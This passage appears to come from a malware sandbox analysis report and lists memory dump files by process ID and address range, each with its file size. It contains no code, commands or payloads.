
                                                                                                                                                                                                                                                                                  • memory/4792-5303-0x000000001DCF0000-0x000000001DD2C000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                                                  • memory/4792-64-0x0000000000910000-0x00000000009D0000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    768KB

                                                                                                                                                                                                                                                                                  • memory/4876-219-0x00000000003F0000-0x00000000003F1000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5164-5305-0x000002700A4F0000-0x000002700A4FA000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                                                  • memory/5164-340-0x0000027022790000-0x00000270227B2000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                                                                                  • memory/5164-5337-0x0000027022900000-0x000002702295C000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    368KB

                                                                                                                                                                                                                                                                                  • memory/5312-5551-0x0000000000E60000-0x00000000014CE000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.4MB

                                                                                                                                                                                                                                                                                  • memory/5312-5598-0x0000000000E60000-0x00000000014CE000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.4MB

                                                                                                                                                                                                                                                                                  • memory/5324-5523-0x0000000000D40000-0x00000000013AE000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.4MB

                                                                                                                                                                                                                                                                                  • memory/5380-5553-0x0000000004130000-0x0000000004484000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                                                                                  • memory/5448-5525-0x0000000005580000-0x0000000005BA8000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.2MB

                                                                                                                                                                                                                                                                                  • memory/5448-5524-0x0000000004E20000-0x0000000004E56000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    216KB

                                                                                                                                                                                                                                                                                  • memory/5448-5526-0x00000000053F0000-0x0000000005412000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                                                                                  • memory/5476-5339-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                                                  • memory/5508-5616-0x0000000006C30000-0x0000000006C62000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                                                  • memory/5508-5618-0x000000006EA30000-0x000000006ED84000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                                                                                  • memory/5508-5617-0x000000006E750000-0x000000006E79C000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                  • memory/5508-5615-0x0000000006800000-0x000000000681A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    104KB

                                                                                                                                                                                                                                                                                  • memory/5508-5629-0x0000000006C20000-0x0000000006C2A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                                                  • memory/5508-5630-0x0000000007560000-0x00000000075F6000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    600KB

                                                                                                                                                                                                                                                                                  • memory/5508-5632-0x0000000006DD0000-0x0000000006DE1000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    68KB

                                                                                                                                                                                                                                                                                  • memory/5508-5636-0x0000000006E00000-0x0000000006E0E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    56KB

                                                                                                                                                                                                                                                                                  • memory/5508-5610-0x0000000005A60000-0x0000000005AAC000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                  • memory/5508-5637-0x0000000006E20000-0x0000000006E34000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                  • memory/5508-5638-0x00000000074E0000-0x00000000074FA000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    104KB

                                                                                                                                                                                                                                                                                  • memory/5508-5639-0x0000000007510000-0x0000000007518000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                                                  • memory/5552-387-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-401-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-370-0x0000000000770000-0x0000000000BF6000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                                                                                  • memory/5552-409-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-413-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-417-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-3069-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-3068-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-3071-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-415-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-411-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-407-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-385-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-5257-0x00000000069B0000-0x00000000069FC000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                  • memory/5552-395-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-399-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-405-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-398-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-5540-0x0000000006DF0000-0x0000000006E44000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    336KB

                                                                                                                                                                                                                                                                                  • memory/5552-373-0x0000000006740000-0x0000000006980000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-403-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-393-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-391-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-5256-0x0000000006BC0000-0x0000000006C3E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    504KB

                                                                                                                                                                                                                                                                                  • memory/5552-376-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-377-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-379-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-381-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-383-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5552-389-0x0000000006740000-0x000000000697A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                  • memory/5636-5647-0x00000000054C0000-0x0000000005814000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                                                                                  • memory/5652-5265-0x0000000000DF0000-0x000000000129E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                                                                  • memory/5652-375-0x0000000000DF0000-0x000000000129E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                                                                  • memory/5960-5574-0x00000000065E0000-0x000000000662C000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                  • memory/5960-5573-0x0000000006540000-0x000000000655E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                  • memory/5972-5538-0x0000000005380000-0x00000000056D4000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                                                                                  • memory/5972-5537-0x0000000004B60000-0x0000000004BC6000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    408KB

                                                                                                                                                                                                                                                                                  • memory/6040-5416-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    15.5MB